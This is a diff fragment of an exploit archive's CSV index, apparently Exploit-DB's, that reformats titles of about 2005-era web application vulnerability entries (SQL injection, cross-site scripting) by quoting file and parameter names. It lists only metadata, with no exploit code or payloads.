M1/M2/M3/Imgsrc/M4 - 'URI' Cross-Site Scripting",2005-04-19,Thom,php,webapps,0 25464,platforms/php/webapps/25464.txt,"CityPost Simple PHP Upload - 'Simple-upload-53.php' Cross-Site Scripting",2005-04-19,Thom,php,webapps,0 -25466,platforms/asp/webapps/25466.txt,"ECommPro 3.0 - Admin/login.asp SQL Injection",2005-04-20,c0d3r,asp,webapps,0 -25467,platforms/php/webapps/25467.txt,"Netref 4.2 - Cat_for_gen.php Remote PHP Script Injection",2005-04-20,jaguar,php,webapps,0 +25466,platforms/asp/webapps/25466.txt,"ECommPro 3.0 - 'Admin/login.asp' SQL Injection",2005-04-20,c0d3r,asp,webapps,0 +25467,platforms/php/webapps/25467.txt,"Netref 4.2 - 'Cat_for_gen.php' Remote PHP Script Injection",2005-04-20,jaguar,php,webapps,0 25468,platforms/php/webapps/25468.txt,"PHP Labs - '.proFile' Dir URI Cross-Site Scripting",2005-04-20,sNKenjoi,php,webapps,0 25469,platforms/php/webapps/25469.txt,"Ocean12 Calendar Manager 1.0 - Admin Form SQL Injection",2005-04-20,Zinho,php,webapps,0 25473,platforms/php/webapps/25473.txt,"PHP Labs - '.proFile' File URI Cross-Site Scripting",2005-04-20,sNKenjoi,php,webapps,0 @@ -28305,30 +28306,30 @@ id,file,description,date,author,platform,type,port 25494,platforms/php/webapps/25494.txt,"ProfitCode Software PayProCart 3.0 - AdminShop ProMod Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 25495,platforms/php/webapps/25495.txt,"ProfitCode Software PayProCart 3.0 - AdminShop MMActionComm Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 25496,platforms/php/webapps/25496.txt,"PHP-Charts 1.0 - Code Execution",2013-05-17,"fizzle stick",php,webapps,0 -25498,platforms/asp/webapps/25498.txt,"ASPNuke 0.80 - Comments.asp SQL Injection",2005-04-22,Dcrab,asp,webapps,0 -25500,platforms/asp/webapps/25500.txt,"ASPNuke 0.80 - detail.asp SQL Injection",2005-04-22,Dcrab,asp,webapps,0 -25501,platforms/asp/webapps/25501.txt,"ASPNuke 0.80 - profile.asp Cross-Site Scripting",2005-04-22,Dcrab,asp,webapps,0 -25502,platforms/asp/webapps/25502.txt,"ASPNuke 0.80 - Select.asp Cross-Site Scripting",2005-04-22,Dcrab,asp,webapps,0 +25498,platforms/asp/webapps/25498.txt,"ASPNuke 0.80 - 'Comments.asp' SQL Injection",2005-04-22,Dcrab,asp,webapps,0 +25500,platforms/asp/webapps/25500.txt,"ASPNuke 0.80 - 'detail.asp' SQL Injection",2005-04-22,Dcrab,asp,webapps,0 +25501,platforms/asp/webapps/25501.txt,"ASPNuke 0.80 - 'profile.asp' Cross-Site Scripting",2005-04-22,Dcrab,asp,webapps,0 +25502,platforms/asp/webapps/25502.txt,"ASPNuke 0.80 - 'Select.asp' Cross-Site Scripting",2005-04-22,Dcrab,asp,webapps,0 25503,platforms/php/webapps/25503.txt,"WoltLab Burning Board 2.3.1 - 'thread.php' Cross-Site Scripting",2005-04-22,deluxe89,php,webapps,0 -25504,platforms/asp/webapps/25504.txt,"Black Knight Forum 4.0 - Member.asp SQL Injection",2005-04-23,Dcrab,asp,webapps,0 -25505,platforms/asp/webapps/25505.txt,"Black Knight Forum 4.0 - forum.asp SQL Injection",2005-04-23,Dcrab,asp,webapps,0 -25506,platforms/asp/webapps/25506.txt,"CartWIZ 1.10 - AddToCart.asp SQL Injection",2005-04-23,Dcrab,asp,webapps,0 -25507,platforms/asp/webapps/25507.txt,"CartWIZ 1.10 - ProductCatalogSubCats.asp SQL Injection",2005-04-23,Dcrab,asp,webapps,0 -25508,platforms/asp/webapps/25508.txt,"CartWIZ 1.10 - ProductDetails.asp SQL Injection",2005-04-23,Dcrab,asp,webapps,0 -25509,platforms/asp/webapps/25509.txt,"CartWIZ 1.10 - searchresults.asp PriceTo Argument SQL Injection",2005-04-23,Dcrab,asp,webapps,0 -25510,platforms/asp/webapps/25510.txt,"CartWIZ 1.10 - searchresults.asp PriceFrom Argument SQL Injection",2005-04-23,Dcrab,asp,webapps,0 +25504,platforms/asp/webapps/25504.txt,"Black Knight Forum 4.0 - 'Member.asp' SQL Injection",2005-04-23,Dcrab,asp,webapps,0 +25505,platforms/asp/webapps/25505.txt,"Black Knight Forum 4.0 - 'forum.asp' SQL Injection",2005-04-23,Dcrab,asp,webapps,0 +25506,platforms/asp/webapps/25506.txt,"CartWIZ 1.10 - 'AddToCart.asp' SQL Injection",2005-04-23,Dcrab,asp,webapps,0 +25507,platforms/asp/webapps/25507.txt,"CartWIZ 1.10 - 'ProductCatalogSubCats.asp' SQL Injection",2005-04-23,Dcrab,asp,webapps,0 +25508,platforms/asp/webapps/25508.txt,"CartWIZ 1.10 - 'ProductDetails.asp' SQL Injection",2005-04-23,Dcrab,asp,webapps,0 +25509,platforms/asp/webapps/25509.txt,"CartWIZ 1.10 - 'searchresults.asp' PriceTo Argument SQL Injection",2005-04-23,Dcrab,asp,webapps,0 +25510,platforms/asp/webapps/25510.txt,"CartWIZ 1.10 - 'searchresults.asp' PriceFrom Argument SQL Injection",2005-04-23,Dcrab,asp,webapps,0 40395,platforms/php/webapps/40395.txt,"Kajona 4.7 - Cross-Site Scripting / Directory Traversal",2016-09-19,"Curesec Research Team",php,webapps,80 -25511,platforms/asp/webapps/25511.txt,"CartWIZ 1.10 - searchresults.asp idcategory Argument SQL Injection",2005-04-23,Dcrab,asp,webapps,0 -25512,platforms/asp/webapps/25512.txt,"CartWIZ 1.10 - TellAFriend.asp Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 -25513,platforms/asp/webapps/25513.txt,"CartWIZ 1.10 - AddToWishlist.asp Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 -25514,platforms/asp/webapps/25514.txt,"CartWIZ 1.10 - Access.asp Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 -25515,platforms/asp/webapps/25515.txt,"CartWIZ 1.10 - error.asp Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 +25511,platforms/asp/webapps/25511.txt,"CartWIZ 1.10 - 'searchresults.asp' idcategory Argument SQL Injection",2005-04-23,Dcrab,asp,webapps,0 +25512,platforms/asp/webapps/25512.txt,"CartWIZ 1.10 - 'TellAFriend.asp' Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 +25513,platforms/asp/webapps/25513.txt,"CartWIZ 1.10 - 'AddToWishlist.asp' Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 +25514,platforms/asp/webapps/25514.txt,"CartWIZ 1.10 - 'Access.asp' Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 +25515,platforms/asp/webapps/25515.txt,"CartWIZ 1.10 - 'error.asp' Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 25516,platforms/asp/webapps/25516.txt,"CartWIZ 1.10 - 'login.asp' Redirect Argument Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 25518,platforms/php/webapps/25518.txt,"Exponent CMS 2.2.0 Beta 3 - Multiple Vulnerabilities",2013-05-17,"High-Tech Bridge SA",php,webapps,0 -25519,platforms/php/webapps/25519.txt,"ZPanel - templateparser.class.php Crafted Template Remote Command Execution",2013-04-16,"Sven Slootweg",php,webapps,0 +25519,platforms/php/webapps/25519.txt,"ZPanel - 'templateparser.class.php' Crafted Template Remote Command Execution",2013-04-16,"Sven Slootweg",php,webapps,0 25520,platforms/asp/webapps/25520.txt,"CartWIZ 1.10 - 'login.asp' Message Argument Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 -25521,platforms/asp/webapps/25521.txt,"CartWIZ 1.10 - searchresults.asp SKU Argument Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 -25522,platforms/asp/webapps/25522.txt,"CartWIZ 1.10 - searchresults.asp Name Argument Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 +25521,platforms/asp/webapps/25521.txt,"CartWIZ 1.10 - 'searchresults.asp' SKU Argument Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 +25522,platforms/asp/webapps/25522.txt,"CartWIZ 1.10 - 'searchresults.asp' Name Argument Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 25523,platforms/php/webapps/25523.txt,"phpBB 2.0.x - 'profile.php' Cross-Site Scripting",2005-04-23,HaCkZaTaN,php,webapps,0 25524,platforms/php/webapps/25524.txt,"phpBB 2.0.x - 'viewtopic.php' Cross-Site Scripting",2005-04-23,HaCkZaTaN,php,webapps,0 25528,platforms/php/webapps/25528.txt,"WoltLab Burning Board 2.3.1 - 'PMS.php' Cross-Site Scripting",2005-04-25,deluxe89,php,webapps,0 @@ -28338,16 +28339,16 @@ id,file,description,date,author,platform,type,port 25532,platforms/php/webapps/25532.txt,"Yappa-ng 1.x/2.x - Unspecified Remote File Inclusion",2005-04-24,"James Bercegay",php,webapps,0 25533,platforms/php/webapps/25533.txt,"Yappa-ng 1.x/2.x - Unspecified Cross-Site Scripting",2005-04-24,"James Bercegay",php,webapps,0 25534,platforms/php/webapps/25534.txt,"SqWebMail 3.x/4.0 - HTTP Response Splitting",2005-04-15,Zinho,php,webapps,0 -25535,platforms/php/webapps/25535.txt,"Invision Power Board 2.0.1 - QPid Parameter SQL Injection",2005-04-26,SVT,php,webapps,0 -25536,platforms/asp/webapps/25536.txt,"MetaCart E-Shop V-8 - IntProdID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 -25537,platforms/asp/webapps/25537.txt,"MetaCart E-Shop V-8 - StrCatalog_NAME Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 +25535,platforms/php/webapps/25535.txt,"Invision Power Board 2.0.1 - 'QPid' SQL Injection",2005-04-26,SVT,php,webapps,0 +25536,platforms/asp/webapps/25536.txt,"MetaCart E-Shop V-8 - 'IntProdID' SQL Injection",2005-04-26,Dcrab,asp,webapps,0 +25537,platforms/asp/webapps/25537.txt,"MetaCart E-Shop V-8 - 'StrCatalog_NAME' SQL Injection",2005-04-26,Dcrab,asp,webapps,0 25538,platforms/php/webapps/25538.txt,"GrayCMS 1.1 - 'error.php' Remote File Inclusion",2005-04-26,Kold,php,webapps,0 -25539,platforms/asp/webapps/25539.txt,"MetaCart2 - IntCatalogID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 -25540,platforms/asp/webapps/25540.txt,"MetaCart2 - StrSubCatalogID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 -25541,platforms/asp/webapps/25541.txt,"MetaCart2 - CurCatalogID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 -25542,platforms/asp/webapps/25542.txt,"MetaCart2 - strSubCatalog_NAME Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 +25539,platforms/asp/webapps/25539.txt,"MetaCart2 - 'IntCatalogID' SQL Injection",2005-04-26,Dcrab,asp,webapps,0 +25540,platforms/asp/webapps/25540.txt,"MetaCart2 - 'StrSubCatalogID' SQL Injection",2005-04-26,Dcrab,asp,webapps,0 +25541,platforms/asp/webapps/25541.txt,"MetaCart2 - 'CurCatalogID' SQL Injection",2005-04-26,Dcrab,asp,webapps,0 +25542,platforms/asp/webapps/25542.txt,"MetaCart2 - 'strSubCatalog_NAME' SQL Injection",2005-04-26,Dcrab,asp,webapps,0 25543,platforms/asp/webapps/25543.txt,"MetaCart2 - 'SearchAction.asp' Multiple SQL Injections",2005-04-26,Dcrab,asp,webapps,0 -25544,platforms/asp/webapps/25544.txt,"MetaBid Auctions - intAuctionID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 +25544,platforms/asp/webapps/25544.txt,"MetaBid Auctions - 'intAuctionID' SQL Injection",2005-04-26,Dcrab,asp,webapps,0 25545,platforms/php/webapps/25545.txt,"BBlog 0.7.4 - 'PostID' SQL Injection",2004-04-26,jericho+bblog@attrition.org,php,webapps,0 25548,platforms/php/webapps/25548.txt,"PHPCart - Input Validation",2005-04-27,Lostmon,php,webapps,0 25549,platforms/php/webapps/25549.txt,"Claroline 1.5/1.6 - 'toolaccess_details.php?tool' Cross-Site Scripting",2005-04-27,"Sieg Fried",php,webapps,0 @@ -28355,36 +28356,36 @@ id,file,description,date,author,platform,type,port 25551,platforms/php/webapps/25551.txt,"Claroline 1.5/1.6 - 'myagenda.php?coursePath' Cross-Site Scripting",2005-04-27,"Sieg Fried",php,webapps,0 25552,platforms/php/webapps/25552.txt,"Claroline E-Learning 1.5/1.6 - 'userInfo.php' Multiple SQL Injections",2005-04-27,"Sieg Fried",php,webapps,0 25553,platforms/php/webapps/25553.txt,"Claroline E-Learning 1.5/1.6 - 'exercises_details.php?exo_id' SQL Injection",2005-04-27,"Sieg Fried",php,webapps,0 -25555,platforms/php/webapps/25555.txt,"Dream4 Koobi CMS 4.2.3 - 'index.php' P Parameter SQL Injection",2005-04-27,"CENSORED Search Vulnerabilities",php,webapps,0 -25556,platforms/php/webapps/25556.txt,"Dream4 Koobi CMS 4.2.3 - 'index.php' Q Parameter SQL Injection",2005-04-27,"CENSORED Search Vulnerabilities",php,webapps,0 +25555,platforms/php/webapps/25555.txt,"Dream4 Koobi CMS 4.2.3 - 'index.php?P' SQL Injection",2005-04-27,"CENSORED Search Vulnerabilities",php,webapps,0 +25556,platforms/php/webapps/25556.txt,"Dream4 Koobi CMS 4.2.3 - 'index.php?Q' SQL Injection",2005-04-27,"CENSORED Search Vulnerabilities",php,webapps,0 25558,platforms/php/webapps/25558.txt,"Notes Module for phpBB - SQL Injection",2005-04-28,"James Bercegay",php,webapps,0 25560,platforms/php/webapps/25560.txt,"Just William's Amazon Webstore - 'Closeup.php?Image' Cross-Site Scripting",2005-04-28,Lostmon,php,webapps,0 25564,platforms/php/webapps/25564.txt,"Just William's Amazon Webstore - 'CurrentIsExpanded' Cross-Site Scripting",2005-04-28,Lostmon,php,webapps,0 25565,platforms/php/webapps/25565.txt,"Just William's Amazon Webstore - 'searchFor' Cross-Site Scripting",2005-04-28,Lostmon,php,webapps,0 25566,platforms/php/webapps/25566.txt,"Just William's Amazon Webstore - 'CurrentNumber' Cross-Site Scripting",2005-04-28,Lostmon,php,webapps,0 25567,platforms/php/webapps/25567.txt,"Just William's Amazon Webstore - HTTP Response Splitting",2005-04-28,Lostmon,php,webapps,0 -25568,platforms/php/webapps/25568.txt,"phpCOIN 1.2 - 'login.php' PHPcoinsessid Parameter SQL Injection",2005-04-28,Dcrab,php,webapps,0 +25568,platforms/php/webapps/25568.txt,"phpCOIN 1.2 - 'login.php?PHPcoinsessid' SQL Injection",2005-04-28,Dcrab,php,webapps,0 25569,platforms/php/webapps/25569.txt,"phpCOIN 1.2 Pages Module - Multiple SQL Injections",2005-04-28,Dcrab,php,webapps,0 25570,platforms/php/webapps/25570.txt,"JGS-Portal 3.0.1 - 'ID' SQL Injection",2005-04-30,admin@batznet.com,php,webapps,0 25575,platforms/php/webapps/25575.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - 'basket.php' Multiple Cross-Site Scripting Vulnerabilities",2005-05-02,Lostmon,php,webapps,0 -25576,platforms/php/webapps/25576.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - 'page.php' page Parameter Cross-Site Scripting",2005-05-02,Lostmon,php,webapps,0 +25576,platforms/php/webapps/25576.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - 'page.php?page' Cross-Site Scripting",2005-05-02,Lostmon,php,webapps,0 25577,platforms/php/webapps/25577.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - 'reviews.php' Multiple Cross-Site Scripting Vulnerabilities",2005-05-02,Lostmon,php,webapps,0 25578,platforms/php/webapps/25578.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - 'product_details.php?category_id' Cross-Site Scripting",2005-05-02,Lostmon,php,webapps,0 25579,platforms/php/webapps/25579.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - 'products.php' Multiple Cross-Site Scripting Vulnerabilities",2005-05-02,Lostmon,php,webapps,0 25580,platforms/php/webapps/25580.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - 'news_view.php' Multiple Cross-Site Scripting Vulnerabilities",2005-05-02,Lostmon,php,webapps,0 25720,platforms/php/webapps/25720.txt,"Vanilla Forums 2.0.18.8 - Multiple Vulnerabilities",2013-05-26,"Henry Hoggard",php,webapps,0 -25585,platforms/asp/webapps/25585.txt,"Maxwebportal 1.3 - dl_popular.asp SQL Injection",2005-05-02,s-dalili,asp,webapps,0 -25586,platforms/asp/webapps/25586.txt,"Maxwebportal 1.3 - links_popular.asp SQL Injection",2005-05-02,s-dalili,asp,webapps,0 -25587,platforms/asp/webapps/25587.txt,"Maxwebportal 1.3 - pic_popular.asp SQL Injection",2005-05-02,s-dalili,asp,webapps,0 -25588,platforms/asp/webapps/25588.txt,"Maxwebportal 1.3 - dl_toprated.asp SQL Injection",2005-05-02,s-dalili,asp,webapps,0 +25585,platforms/asp/webapps/25585.txt,"Maxwebportal 1.3 - 'dl_popular.asp' SQL Injection",2005-05-02,s-dalili,asp,webapps,0 +25586,platforms/asp/webapps/25586.txt,"Maxwebportal 1.3 - 'links_popular.asp' SQL Injection",2005-05-02,s-dalili,asp,webapps,0 +25587,platforms/asp/webapps/25587.txt,"Maxwebportal 1.3 - 'pic_popular.asp' SQL Injection",2005-05-02,s-dalili,asp,webapps,0 +25588,platforms/asp/webapps/25588.txt,"Maxwebportal 1.3 - 'dl_toprated.asp' SQL Injection",2005-05-02,s-dalili,asp,webapps,0 25589,platforms/asp/webapps/25589.txt,"Maxwebportal 1.3 - 'custom_link.asp' Multiple SQL Injections",2005-05-02,s-dalili,asp,webapps,0 25590,platforms/php/webapps/25590.txt,"osTicket 1.2/1.3 - Multiple Input Validation / Remote Code Injection Vulnerabilities",2005-05-03,"James Bercegay",php,webapps,0 25591,platforms/php/webapps/25591.txt,"SitePanel2 2.6.1 - Multiple Input Validation Vulnerabilities",2005-05-03,"James Bercegay",php,webapps,0 25592,platforms/cgi/webapps/25592.txt,"WebCrossing WebX 5.0 - Cross-Site Scripting",2005-05-03,dr_insane,cgi,webapps,0 -25593,platforms/php/webapps/25593.txt,"Invision Power Board 2.0.3/2.1 - Act Parameter Cross-Site Scripting",2005-05-03,"arron ward",php,webapps,0 +25593,platforms/php/webapps/25593.txt,"Invision Power Board 2.0.3/2.1 - 'Act' Cross-Site Scripting",2005-05-03,"arron ward",php,webapps,0 25594,platforms/cgi/webapps/25594.txt,"Gossamer Threads Links 2.x - User.cgi Cross-Site Scripting",2005-05-04,"Nathan House",cgi,webapps,0 -25595,platforms/asp/webapps/25595.txt,"ASP Inline Corporate Calendar 3.6.3 - Defer.asp SQL Injection",2005-05-04,Zinho,asp,webapps,0 -25596,platforms/asp/webapps/25596.txt,"ASP Inline Corporate Calendar 3.6.3 - Details.asp SQL Injection",2005-05-04,Zinho,asp,webapps,0 +25595,platforms/asp/webapps/25595.txt,"ASP Inline Corporate Calendar 3.6.3 - 'Defer.asp' SQL Injection",2005-05-04,Zinho,asp,webapps,0 +25596,platforms/asp/webapps/25596.txt,"ASP Inline Corporate Calendar 3.6.3 - 'Details.asp' SQL Injection",2005-05-04,Zinho,asp,webapps,0 25599,platforms/php/webapps/25599.txt,"Interspire articlelive 2005 - Multiple Vulnerabilities",2005-05-04,Dcrab,php,webapps,0 25601,platforms/php/webapps/25601.txt,"FishCart 3.1 - 'display.php?nlst' Cross-Site Scripting",2005-05-04,Dcrab,php,webapps,0 25602,platforms/php/webapps/25602.txt,"FishCart 3.1 - 'upstracking.php' Multiple Cross-Site Scripting Vulnerabilities",2005-05-04,Dcrab,php,webapps,0 @@ -28407,8 +28408,8 @@ id,file,description,date,author,platform,type,port 25620,platforms/php/webapps/25620.txt,"MidiCart PHP - 'Item_List.php?MainGroup' Cross-Site Scripting",2005-05-05,Exoduks,php,webapps,0 25622,platforms/cgi/webapps/25622.txt,"MegaBook 2.0/2.1 - Admin.cgi EntryID Cross-Site Scripting",2005-05-05,"Spy Hat",cgi,webapps,0 25623,platforms/php/webapps/25623.txt,"CJ Ultra Plus 1.0.3/1.0.4 - 'OUT.php' SQL Injection",2005-05-06,Kold,php,webapps,0 -25628,platforms/jsp/webapps/25628.txt,"phpBB 2.0.x - URL Tag BBCode.php",2005-05-09,Papados,jsp,webapps,0 -25630,platforms/php/webapps/25630.txt,"Advanced Guestbook 2.3.1/2.4 - 'index.php' Entry Parameter SQL Injection",2005-05-09,"Spy Hat",php,webapps,0 +25628,platforms/jsp/webapps/25628.txt,"phpBB 2.0.x - 'BBCode.php' URL Tag",2005-05-09,Papados,jsp,webapps,0 +25630,platforms/php/webapps/25630.txt,"Advanced Guestbook 2.3.1/2.4 - 'index.php?Entry' SQL Injection",2005-05-09,"Spy Hat",php,webapps,0 25632,platforms/cgi/webapps/25632.txt,"Easy Message Board - Directory Traversal",2005-05-09,"SoulBlack Group",cgi,webapps,0 25634,platforms/cgi/webapps/25634.txt,"Easy Message Board - Remote Command Execution",2005-05-09,"SoulBlack Group",cgi,webapps,0 25635,platforms/php/webapps/25635.txt,"PHP-Nuke 0-7 - Double Hex Encoded Input Validation",2005-05-09,fistfuxxer@gmx.de,php,webapps,0 @@ -28428,15 +28429,15 @@ id,file,description,date,author,platform,type,port 25655,platforms/php/webapps/25655.txt,"Ultimate PHP Board 1.8/1.9 - 'viewforum.php' SQL Injection",2005-05-13,"Morinex Eneco",php,webapps,0 25656,platforms/php/webapps/25656.txt,"OpenBB 1.0.8 - 'Read.php' SQL Injection",2005-05-13,Megasky,php,webapps,0 25657,platforms/php/webapps/25657.txt,"OpenBB 1.0.8 - 'member.php' Cross-Site Scripting",2005-05-13,Megasky,php,webapps,0 -25659,platforms/php/webapps/25659.txt,"PHPHeaven PHPMyChat 0.14.5 - Start-Page.CSS.php3 Cross-Site Scripting",2005-05-13,Megasky,php,webapps,0 -25660,platforms/php/webapps/25660.txt,"PHPHeaven PHPMyChat 0.14.5 - Style.CSS.php3 Cross-Site Scripting",2005-05-13,Megasky,php,webapps,0 +25659,platforms/php/webapps/25659.txt,"PHPHeaven PHPMyChat 0.14.5 - 'Start-Page.CSS.php3' Cross-Site Scripting",2005-05-13,Megasky,php,webapps,0 +25660,platforms/php/webapps/25660.txt,"PHPHeaven PHPMyChat 0.14.5 - 'Style.CSS.php3' Cross-Site Scripting",2005-05-13,Megasky,php,webapps,0 25661,platforms/asp/webapps/25661.txt,"Keyvan1 ImageGallery - Database Download",2005-05-01,"g0rellazz G0r",asp,webapps,0 25662,platforms/php/webapps/25662.txt,"Skull-Splitter Guestbook 1.0/2.0/2.2 - Multiple HTML Injection Vulnerabilities",2005-05-14,"Morinex Eneco",php,webapps,0 25663,platforms/php/webapps/25663.txt,"Shop-Script - categoryId SQL Injection",2005-05-16,"CENSORED Search Vulnerabilities",php,webapps,0 25664,platforms/php/webapps/25664.txt,"Shop-Script - ProductID SQL Injection",2005-05-16,"CENSORED Search Vulnerabilities",php,webapps,0 25665,platforms/php/webapps/25665.txt,"PostNuke 0.75/0.76 Blocks Module - Directory Traversal",2005-05-16,pokley,php,webapps,0 25666,platforms/cgi/webapps/25666.txt,"PServ 3.2 - Source Code Disclosure",2005-05-16,"Claus R. F. Overbeck",cgi,webapps,0 -25667,platforms/asp/webapps/25667.txt,"MetaCart E-Shop - ProductsByCategory.asp Cross-Site Scripting",2005-05-16,"Dedi Dwianto",asp,webapps,0 +25667,platforms/asp/webapps/25667.txt,"MetaCart E-Shop - 'ProductsByCategory.asp' Cross-Site Scripting",2005-05-16,"Dedi Dwianto",asp,webapps,0 25668,platforms/cgi/webapps/25668.txt,"Sigma ISP Manager 6.6 - 'Sigmaweb.dll' SQL Injection",2005-05-16,"mehran gashtasebi",cgi,webapps,0 25671,platforms/php/webapps/25671.txt,"NPDS 4.8/5.0 - 'comments.php?thold' SQL Injection",2005-05-16,NoSP,php,webapps,0 25672,platforms/php/webapps/25672.txt,"NPDS 4.8/5.0 - 'pollcomments.php?thold' SQL Injection",2005-05-16,NoSP,php,webapps,0 @@ -28452,8 +28453,8 @@ id,file,description,date,author,platform,type,port 25683,platforms/php/webapps/25683.txt,"Help Center Live 1.0/1.2.x - Multiple Input Validation Vulnerabilities",2005-05-24,"GulfTech Security",php,webapps,0 25685,platforms/jsp/webapps/25685.txt,"Sun JavaMail 1.3 - API MimeMessage Infromation Disclosure",2005-05-19,"Ricky Latt",jsp,webapps,0 25686,platforms/php/webapps/25686.txt,"PHP Advanced Transfer Manager 1.21 - Arbitrary File Inclusion",2005-05-19,"Ingvar Gilbert",php,webapps,0 -25689,platforms/php/webapps/25689.txt,"EJ3 TOPo 2.2 - Multiple index.php Cross-Site Scripting Vulnerabilities",2003-05-20,Lostmon,php,webapps,0 -25690,platforms/php/webapps/25690.pl,"PortailPHP 1.3 - ID Parameter SQL Injection",2005-05-23,"CENSORED Search Vulnerabilities",php,webapps,0 +25689,platforms/php/webapps/25689.txt,"EJ3 TOPo 2.2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2003-05-20,Lostmon,php,webapps,0 +25690,platforms/php/webapps/25690.pl,"PortailPHP 1.3 - 'ID' SQL Injection",2005-05-23,"CENSORED Search Vulnerabilities",php,webapps,0 25693,platforms/php/webapps/25693.txt,"GForge 3.x - Arbitrary Command Execution",2005-05-24,"Filippo Spike Morelli",php,webapps,0 25766,platforms/php/webapps/25766.txt,"Qualiteam X-Cart 4.0.8 - 'giftcert.php' Multiple Cross-Site Scripting Vulnerabilities",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 25700,platforms/asp/webapps/25700.txt,"Spread The Word - Multiple Cross-Site Scripting Vulnerabilities",2005-05-24,Lostmon,asp,webapps,0 @@ -28469,13 +28470,13 @@ id,file,description,date,author,platform,type,port 25726,platforms/php/webapps/25726.txt,"RadioCMS 2.2 - 'menager.php?playlist_id' SQL Injection",2013-05-26,Rooster(XEKA),php,webapps,0 25727,platforms/php/webapps/25727.txt,"BookReview 1.0 - 'add_review.htm' Multiple Cross-Site Scripting Vulnerabilities",2005-05-26,Lostmon,php,webapps,0 25728,platforms/php/webapps/25728.txt,"BookReview 1.0 - 'add_contents.htm' Multiple Cross-Site Scripting Vulnerabilities",2005-05-26,Lostmon,php,webapps,0 -25729,platforms/php/webapps/25729.txt,"BookReview 1.0 - suggest_category.htm node Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 -25730,platforms/php/webapps/25730.txt,"BookReview 1.0 - contact.htm user Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 -25731,platforms/php/webapps/25731.txt,"BookReview 1.0 - add_booklist.htm node Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 -25732,platforms/php/webapps/25732.txt,"BookReview 1.0 - add_url.htm node Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 -25733,platforms/php/webapps/25733.txt,"BookReview 1.0 - search.htm submit string Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 -25734,platforms/php/webapps/25734.txt,"BookReview 1.0 - add_classification.htm isbn Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 -25735,platforms/php/webapps/25735.txt,"BookReview 1.0 - suggest_review.htm node Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 +25729,platforms/php/webapps/25729.txt,"BookReview 1.0 - 'suggest_category.htm?node' Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 +25730,platforms/php/webapps/25730.txt,"BookReview 1.0 - 'contact.htm?user' Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 +25731,platforms/php/webapps/25731.txt,"BookReview 1.0 - 'add_booklist.htm?node' Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 +25732,platforms/php/webapps/25732.txt,"BookReview 1.0 - 'add_url.htm?node' Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 +25733,platforms/php/webapps/25733.txt,"BookReview 1.0 - 'search.htm?submit string' Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 +25734,platforms/php/webapps/25734.txt,"BookReview 1.0 - 'add_classification.htm?isbn' Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 +25735,platforms/php/webapps/25735.txt,"BookReview 1.0 - 'suggest_review.htm?node' Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 25738,platforms/jsp/webapps/25738.txt,"BEA WebLogic 7.0/8.1 - Administration Console LoginForm.jsp Cross-Site Scripting",2005-05-27,"Team SHATTER",jsp,webapps,0 25739,platforms/jsp/webapps/25739.txt,"BEA WebLogic 7.0/8.1 - Administration Console Error Page Cross-Site Scripting",2005-05-27,"Team SHATTER",jsp,webapps,0 25740,platforms/php/webapps/25740.txt,"Jaws Glossary 0.4/0.5 - Cross-Site Scripting",2005-05-27,Nah,php,webapps,0 @@ -28483,15 +28484,15 @@ id,file,description,date,author,platform,type,port 25742,platforms/php/webapps/25742.txt,"NPDS 4.8 < 5.0 - 'admin.php?language' Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 25743,platforms/php/webapps/25743.txt,"NPDS 4.8 < 5.0 - 'powerpack_f.php?language' Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 25744,platforms/php/webapps/25744.txt,"NPDS 4.8 < 5.0 - 'sdv_infos.php?sitename' Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 -25745,platforms/php/webapps/25745.txt,"NPDS 4.8 /5.0 - 'modules.php' Lettre Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 +25745,platforms/php/webapps/25745.txt,"NPDS 4.8 /5.0 - 'modules.php?Lettre' Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 